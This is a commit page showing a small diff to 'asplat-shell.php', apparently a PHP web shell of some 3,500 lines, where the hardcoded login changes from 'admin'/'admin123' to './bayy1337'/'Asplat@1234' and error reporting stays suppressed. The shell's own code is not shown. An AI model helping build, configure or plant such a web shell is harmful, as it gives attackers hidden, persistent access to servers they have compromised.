Skip to content

Commit 39c9bb6

Browse files
authored
Update asplat-shell.php
1 parent e77d16c commit 39c9bb6

File tree

1 file changed

+3
-2
lines changed

1 file changed

+3
-2
lines changed

asplat-shell.php

Lines changed: 3 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -3,8 +3,8 @@
33
error_reporting(0);
44

55
// Login Configuration - CHANGE THESE!
6-
$valid_username = "admin";
7-
$valid_password = "admin123";
6+
$valid_username = "./bayy1337";
7+
$valid_password = "Asplat@1234";
88

99
// Check if user is logged in
1010
function isLoggedIn() {
@@ -3540,3 +3540,4 @@ function format_size($size) {
35403540
return round($size, 2) . ' ' . $units[$unit];
35413541
}
35423542
?>
3543+

0 commit comments

Comments
 (0)